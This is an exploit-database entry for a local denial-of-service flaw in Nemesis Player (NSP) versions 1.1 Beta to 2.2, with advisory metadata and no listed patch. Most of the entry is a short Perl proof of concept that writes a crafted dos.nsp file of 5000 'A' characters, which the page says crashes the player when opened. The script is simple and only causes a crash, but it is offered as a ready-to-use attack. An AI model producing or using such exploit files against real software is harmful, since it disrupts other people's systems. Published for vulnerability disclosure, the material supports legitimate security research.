header-logo
Suggest Exploit
vendor:
Nemesis Player (NSP)
by:
Rehan Ahmed
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Nemesis Player (NSP)
Affected Version From: 1.1 Beta
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXP SP2
2020

Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability

Rehan Ahmed discovered a Denial of Service vulnerability in Nemesis Player (NSP) versions 1.1 Beta and 2.2. The vulnerability is triggered when a maliciously crafted .nsp file is opened, causing the application to crash. The exploit code creates a file with 5000 'A' characters, which when opened in NSP, causes the application to crash.

Mitigation:

No known mitigation is available at this time.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#Exploit Title: Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Vendor:http://www.nsplayer.org
#Version:1.1 Beta/2.2
#Tested On: WinXP SP2

my $boom="\x41" x 5000;
my $file="dos.nsp"; 
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";

Navigation

Suggest Exploit

Services By CQR